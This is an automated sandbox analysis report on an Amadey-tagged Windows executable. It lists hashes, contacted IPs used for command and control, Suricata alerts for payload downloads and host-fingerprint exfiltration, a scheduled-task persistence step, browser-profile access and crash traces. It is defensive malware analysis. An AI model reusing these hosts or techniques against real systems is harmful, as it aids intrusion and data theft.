popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

ama.exe

Amadey .NET framework(MSIL) Malicious Library UPX PWS AntiDebug PE64 PE File DLL OS Processor Check PE32 .NET EXE JPEG Format AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Dec. 12, 2023, 7:43 a.m. Dec. 12, 2023, 7:51 a.m.
Size 5.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 294593fcb93a6d6694c9670e86e649bf
SHA256 6b3383ad0a767b008e8a41db84efea8847de86796aefd3703dcecb7ec3203e27
CRC32 D41CB068
ssdeep 98304:a3t1ASlTBJNo0uwOBq+X9vV2vJmWVFJqP54CzfhnCiOFXrOzxdIoDL/dHMeGT2uV:a91jBJNWwOBq+X5mFGJhnGyzxdh2XFL
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
pastebin.com
A 104.20.67.143
A 172.67.34.170
A 104.20.68.143
104.20.67.143
IP Address Status Action
104.20.67.143 Active Moloch
164.124.101.2 Active Moloch
185.172.128.113 Active Moloch
185.172.128.5 Active Moloch
94.130.51.115 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49167 -> 185.172.128.113:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49167 -> 185.172.128.113:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.172.128.113:80 -> 192.168.56.101:49167 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.113:80 -> 192.168.56.101:49167 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.172.128.113:80 -> 192.168.56.101:49167 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49171 -> 185.172.128.5:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49171 -> 185.172.128.5:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 185.172.128.5:80 -> 192.168.56.101:49171 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.5:80 -> 192.168.56.101:49171 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 185.172.128.5:80 2044597 ET MALWARE Amadey Bot Activity (POST) M1 A Network Trojan was detected
TCP 192.168.56.101:49186 -> 104.20.67.143:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49171 -> 185.172.128.5:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.101:49186
104.20.67.143:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "Utsysc.exe" has successfully been created.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008bb468
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008bb9a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008bb9a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008bb568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008bb568
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x008bb668
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00a8fc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00a8fc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00a8fac8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files (x86)\Google\Chrome\Application\Psi\profiles\default\accounts.xml
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .vmp\xc2\xb0\xc2\xba
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
RtlDeleteBoundaryDescriptor+0x1b RtlAnsiStringToUnicodeString-0x2d ntdll+0x2e688 @ 0x76f3e688
RtlMultiByteToUnicodeN+0x11a RtlDeleteBoundaryDescriptor-0xe ntdll+0x2e65f @ 0x76f3e65f
EtwEventRegister+0x17f EtwRegisterTraceGuidsW-0xa ntdll+0x3f839 @ 0x76f4f839
LdrGetProcedureAddressEx+0x11f wcsstr-0x99d ntdll+0x302ea @ 0x76f402ea
LdrGetProcedureAddress+0x18 LdrGetProcedureAddressEx-0x9 ntdll+0x301c2 @ 0x76f401c2
New_ntdll_LdrGetProcedureAddress@16+0xcd New_ntdll_LdrLoadDll@16-0x87 @ 0x733cd3cd
GetProcAddress+0x44 GetVersion-0x38 kernelbase+0x111c4 @ 0x759811c4
CreateAssemblyNameObject+0xe597 GetMetaDataInternalInterface-0x29ed8 clr+0x3ba30 @ 0x724cba30
CoUninitializeEE+0xa200 CreateAssemblyNameObject-0x3a55 clr+0x29a44 @ 0x724b9a44
CoUninitializeEE+0xa149 CreateAssemblyNameObject-0x3b0c clr+0x2998d @ 0x724b998d
CoUninitializeEE+0xa055 CreateAssemblyNameObject-0x3c00 clr+0x29899 @ 0x724b9899
CoUninitializeEE+0x9fee CreateAssemblyNameObject-0x3c67 clr+0x29832 @ 0x724b9832
DllRegisterServerInternal+0x98c9 CoUninitializeEE-0x3b6f clr+0x1bcd5 @ 0x724abcd5
DllUnregisterServerInternal-0x760b clr+0x2ae9 @ 0x72492ae9
system+0x1eafc4 @ 0x70c5afc4
0x45c86fa
0x2390eb4
system+0x1f9799 @ 0x6fea9799
system+0x1f92c8 @ 0x6fea92c8
system+0x1eca74 @ 0x6fe9ca74
system+0x1ec868 @ 0x6fe9c868
system+0x1f82b8 @ 0x6fea82b8
system+0x1ee54d @ 0x6fe9e54d
system+0x1f70ea @ 0x6fea70ea
system+0x1e56c0 @ 0x6fe956c0
system+0x1f8215 @ 0x6fea8215
system+0x1f6f75 @ 0x6fea6f75
system+0x1ee251 @ 0x6fe9e251
system+0x1ee229 @ 0x6fe9e229
system+0x1ee170 @ 0x6fe9e170
0x86a08e
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
GetWindow+0x3f0 SendMessageW-0x1b user32+0x1965e @ 0x7585965e
SendMessageW+0x4c GetAncestor-0xc0 user32+0x196c5 @ 0x758596c5
system+0x208b08 @ 0x6feb8b08
system+0xaa9bfd @ 0x70759bfd
system+0x1a5e44 @ 0x6fe55e44
system+0x1fd8a0 @ 0x6fead8a0
system+0x1fd792 @ 0x6fead792
system+0x1a14bd @ 0x6fe514bd
0x2390243
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72557610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72bb7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72bb4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 46 04 89 45 f4 c6 47 07 80 c6 47 06 00 8b 5e
exception.symbol: RtlInitUnicodeString+0x196 RtlMultiByteToUnicodeN-0x1a7 ntdll+0x2e39e
exception.instruction: mov eax, dword ptr [esi + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189342
exception.address: 0x76f3e39e
registers.esp: 8708312
registers.edi: 82784536
registers.eax: 0
registers.ebp: 8708364
registers.edx: 82784544
registers.ebx: 82784544
registers.esi: 1078174364
registers.ecx: 9043968
1 0 0

__exception__

 stacktrace: 
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetActivationFactoryImpl+0x5d17 CreateApplicationContext-0x4825 clr+0xa24fe @ 0x725324fe
mscorlib+0x2d54f0 @ 0x716c54f0
mscorlib+0x2d54a5 @ 0x716c54a5
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
RtlDeleteBoundaryDescriptor+0x1b RtlAnsiStringToUnicodeString-0x2d ntdll+0x2e688 @ 0x76f3e688
RtlMultiByteToUnicodeN+0x11a RtlDeleteBoundaryDescriptor-0xe ntdll+0x2e65f @ 0x76f3e65f
EtwEventRegister+0x17f EtwRegisterTraceGuidsW-0xa ntdll+0x3f839 @ 0x76f4f839
LdrGetProcedureAddressEx+0x11f wcsstr-0x99d ntdll+0x302ea @ 0x76f402ea
LdrGetProcedureAddress+0x18 LdrGetProcedureAddressEx-0x9 ntdll+0x301c2 @ 0x76f401c2
New_ntdll_LdrGetProcedureAddress@16+0xcd New_ntdll_LdrLoadDll@16-0x87 @ 0x733cd3cd
GetProcAddress+0x44 GetVersion-0x38 kernelbase+0x111c4 @ 0x759811c4
CreateAssemblyNameObject+0xe597 GetMetaDataInternalInterface-0x29ed8 clr+0x3ba30 @ 0x724cba30
CoUninitializeEE+0xa200 CreateAssemblyNameObject-0x3a55 clr+0x29a44 @ 0x724b9a44
CoUninitializeEE+0xa149 CreateAssemblyNameObject-0x3b0c clr+0x2998d @ 0x724b998d
CoUninitializeEE+0xa055 CreateAssemblyNameObject-0x3c00 clr+0x29899 @ 0x724b9899
CoUninitializeEE+0x9fee CreateAssemblyNameObject-0x3c67 clr+0x29832 @ 0x724b9832
DllRegisterServerInternal+0x98c9 CoUninitializeEE-0x3b6f clr+0x1bcd5 @ 0x724abcd5
DllUnregisterServerInternal-0x760b clr+0x2ae9 @ 0x72492ae9
system+0x1eafc4 @ 0x70c5afc4
0x45c86fa
0x2390eb4
system+0x1f9799 @ 0x6fea9799
system+0x1f92c8 @ 0x6fea92c8
system+0x1eca74 @ 0x6fe9ca74

exception.instruction_r: 8b 46 04 89 45 f4 c6 47 07 80 c6 47 06 00 8b 5e
exception.symbol: RtlInitUnicodeString+0x196 RtlMultiByteToUnicodeN-0x1a7 ntdll+0x2e39e
exception.instruction: mov eax, dword ptr [esi + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189342
exception.address: 0x76f3e39e
registers.esp: 8703116
registers.edi: 82784280
registers.eax: 82754208
registers.ebp: 8703168
registers.edx: 82784288
registers.ebx: 82784288
registers.esi: 1152194588
registers.ecx: 9043968
1 0 0

__exception__

 stacktrace: 
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
RtlFreeSid+0x1b RtlAllocateAndInitializeSid-0x15 ntdll+0x393cd @ 0x76f493cd
GetComputerNameA+0xa84 GetFileInformationByHandleEx-0x62b kernel32+0x2c164 @ 0x755dc164
GetComputerNameA+0xaef GetFileInformationByHandleEx-0x5c0 kernel32+0x2c1cf @ 0x755dc1cf
GetComputerNameA+0xab1 GetFileInformationByHandleEx-0x5fe kernel32+0x2c191 @ 0x755dc191
MapViewOfFileEx+0x21 InitializeCriticalSectionEx-0x84 kernel32+0x14ca4 @ 0x755c4ca4
RegOpenKeyExW+0xf6 LocalFree-0x935 kernel32+0x12407 @ 0x755c2407
RegOpenKeyExW+0x21 LocalFree-0xa0a kernel32+0x12332 @ 0x755c2332
New_advapi32_RegOpenKeyExW@20+0x4f New_advapi32_RegQueryInfoKeyA@48-0x173 @ 0x733c3ca1
CreateAssemblyNameObject+0xc283 GetMetaDataInternalInterface-0x2c1ec clr+0x3971c @ 0x724c971c
StrongNameSignatureVerification+0x9a32 GetMetaDataPublicInterfaceFromInternal-0x1e1e clr+0x1934e8 @ 0x726234e8
StrongNameSignatureVerification+0x9bcc GetMetaDataPublicInterfaceFromInternal-0x1c84 clr+0x193682 @ 0x72623682
GetMetaDataPublicInterfaceFromInternal+0x641 CopyPDBs-0x2fb clr+0x195947 @ 0x72625947
GetMetaDataPublicInterfaceFromInternal+0x850 CopyPDBs-0xec clr+0x195b56 @ 0x72625b56
GetMetaDataPublicInterfaceFromInternal+0x23d CopyPDBs-0x6ff clr+0x195543 @ 0x72625543
StrongNameSignatureVerification+0x839b GetMetaDataPublicInterfaceFromInternal-0x34b5 clr+0x191e51 @ 0x72621e51
StrongNameSignatureVerification+0x854e GetMetaDataPublicInterfaceFromInternal-0x3302 clr+0x192004 @ 0x72622004
mscorlib+0x355147 @ 0x71745147
mscorlib+0x985c14 @ 0x71d75c14
mscorlib+0x9b45cf @ 0x71da45cf
mscorlib+0xd224c1 @ 0x721124c1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
DllUnregisterServerInternal-0x7f84 clr+0x2170 @ 0x72492170
DllUnregisterServerInternal-0x7f5f clr+0x2195 @ 0x72492195
DllUnregisterServerInternal-0x7f4e clr+0x21a6 @ 0x724921a6
CoUninitializeEE+0xd8a2 CreateAssemblyNameObject-0x3b3 clr+0x2d0e6 @ 0x724bd0e6
DllGetActivationFactoryImpl+0x5d17 CreateApplicationContext-0x4825 clr+0xa24fe @ 0x725324fe
mscorlib+0x2d54f0 @ 0x716c54f0
mscorlib+0x2d54a5 @ 0x716c54a5
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1

exception.instruction_r: 8b 46 04 89 45 f4 c6 47 07 80 c6 47 06 00 8b 5e
exception.symbol: RtlInitUnicodeString+0x196 RtlMultiByteToUnicodeN-0x1a7 ntdll+0x2e39e
exception.instruction: mov eax, dword ptr [esi + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 189342
exception.address: 0x76f3e39e
registers.esp: 8694952
registers.edi: 82784280
registers.eax: 82754208
registers.ebp: 8695004
registers.edx: 82784288
registers.ebx: 82784288
registers.esi: 1152194588
registers.ecx: 9043968
1 0 0

__exception__

 stacktrace: 
RtlAllocateHeap+0xac RtlFreeAnsiString-0x54 ntdll+0x2e0d2 @ 0x76f3e0d2
DllGetClassObjectInternal+0x3995f CorDllMainForThunk-0x52b9c clr+0xfe9d8 @ 0x7258e9d8
DllGetClassObjectInternal+0x3cb36 CorDllMainForThunk-0x4f9c5 clr+0x101baf @ 0x72591baf
DllGetClassObjectInternal+0x3ee62 CorDllMainForThunk-0x4d699 clr+0x103edb @ 0x72593edb
DllGetClassObjectInternal+0x3f1f8 CorDllMainForThunk-0x4d303 clr+0x104271 @ 0x72594271
DllGetClassObjectInternal+0x3ef28 CorDllMainForThunk-0x4d5d3 clr+0x103fa1 @ 0x72593fa1
DllGetClassObjectInternal+0x3f9cd CorDllMainForThunk-0x4cb2e clr+0x104a46 @ 0x72594a46
DllGetClassObjectInternal+0x3ca51 CorDllMainForThunk-0x4faaa clr+0x101aca @ 0x72591aca
DllGetClassObjectInternal+0x3e19b CorDllMainForThunk-0x4e360 clr+0x103214 @ 0x72593214
DllGetClassObjectInternal+0x3e4b7 CorDllMainForThunk-0x4e044 clr+0x103530 @ 0x72593530
DllGetClassObjectInternal+0x3e3ed CorDllMainForThunk-0x4e10e clr+0x103466 @ 0x72593466
DllGetClassObjectInternal+0x3ce60 CorDllMainForThunk-0x4f69b clr+0x101ed9 @ 0x72591ed9
DllGetClassObjectInternal+0x3cf04 CorDllMainForThunk-0x4f5f7 clr+0x101f7d @ 0x72591f7d
DllGetClassObjectInternal+0x3cf99 CorDllMainForThunk-0x4f562 clr+0x102012 @ 0x72592012
DllGetClassObjectInternal+0x34d3c CorDllMainForThunk-0x577bf clr+0xf9db5 @ 0x72589db5
DllGetClassObjectInternal+0x34f7f CorDllMainForThunk-0x5757c clr+0xf9ff8 @ 0x72589ff8
DllGetClassObjectInternal+0x34dce CorDllMainForThunk-0x5772d clr+0xf9e47 @ 0x72589e47
DllGetClassObjectInternal+0x34d99 CorDllMainForThunk-0x57762 clr+0xf9e12 @ 0x72589e12
DllGetClassObjectInternal+0x34707 CorDllMainForThunk-0x57df4 clr+0xf9780 @ 0x72589780
CreateAssemblyNameObject+0x2728d GetMetaDataInternalInterface-0x111e2 clr+0x54726 @ 0x724e4726
CreateAssemblyNameObject+0x2730f GetMetaDataInternalInterface-0x11160 clr+0x547a8 @ 0x724e47a8
DllGetClassObjectInternal+0x35622 CorDllMainForThunk-0x56ed9 clr+0xfa69b @ 0x7258a69b
PreBindAssemblyEx+0xe96a StrongNameSignatureVerification-0x35e1 clr+0x1864d5 @ 0x726164d5
mscorlib+0x2d5f5f @ 0x716c5f5f
mscorlib+0x2d5c33 @ 0x716c5c33
mscorlib+0x2d7894 @ 0x716c7894
mscorlib+0x2d74ff @ 0x716c74ff
mscorlib+0x2d71c3 @ 0x716c71c3
mscorlib+0x2d6c3c @ 0x716c6c3c
mscorlib+0x2fcfb1 @ 0x716ecfb1
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0x79c6 CoUninitializeEE-0x5a72 clr+0x19dd2 @ 0x724a9dd2
DllGetClassObjectInternal+0x38b0b CorDllMainForThunk-0x539f0 clr+0xfdb84 @ 0x7258db84
DllGetClassObjectInternal+0x38c16 CorDllMainForThunk-0x538e5 clr+0xfdc8f @ 0x7258dc8f
mscorlib+0x2fce7e @ 0x716ece7e
mscorlib+0x2fcd8c @ 0x716ecd8c
mscorlib+0x2fcd0b @ 0x716ecd0b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x724a2e95
DllGetClassObjectInternal+0x6069a CorDllMainForThunk-0x2be61 clr+0x125713 @ 0x725b5713
DllGetClassObjectInternal+0x6075c CorDllMainForThunk-0x2bd9f clr+0x1257d5 @ 0x725b57d5
mscorlib+0x9bc1c8 @ 0x71dac1c8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72492652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x724a264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x724b9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x724b9e2f
DllGetClassObjectInternal+0xc874 CorDllMainForThunk-0x7fc87 clr+0xd18ed @ 0x725618ed
DllGetClassObjectInternal+0xcb84 CorDllMainForThunk-0x7f977 clr+0xd1bfd @ 0x72561bfd
CreateHistoryReader+0x13d0e PostErrorVA-0x155251 clr+0x223553 @ 0x726b3553
LookupHistoryAssembly+0x1550 CoEEShutDownCOM-0x2c2c clr+0x1d8a42 @ 0x72668a42
DllGetClassObjectInternal+0x5fe1c CorDllMainForThunk-0x2c6df clr+0x124e95 @ 0x725b4e95
DllGetClassObjectInternal+0x5fd5f CorDllMainForThunk-0x2c79c clr+0x124dd8 @ 0x725b4dd8
RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9
RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b
New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x733d482b
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
RtlFreeHeap+0x7e RtlAllocateHeap-0x23 ntdll+0x2e003 @ 0x76f3e003
RtlFreeSid+0x1b RtlAllocateAndInitializeSid-0x15 ntdll+0x393cd @ 0x76f493cd
GetComputerNameA+0xa84 GetFileInformationByHandleEx-0x62b kernel32+0x2c164 @ 0x755dc164
GetComputerNameA+0xaef GetFileInformationByHandleEx-0x5c0 kernel32+0x2c1cf @ 0x755dc1cf
GetComputerNameA+0xab1 GetFileInformationByHandleEx-0x5fe kernel32+0x2c191 @ 0x755dc191
MapViewOfFileEx+0x21 InitializeCriticalSectionEx-0x84 kernel32+0x14ca4 @ 0x755c4ca4

exception.instruction_r: 0f b7 06 99 0f a4 c2 10 c1 e0 10 0b f8 0b da 89
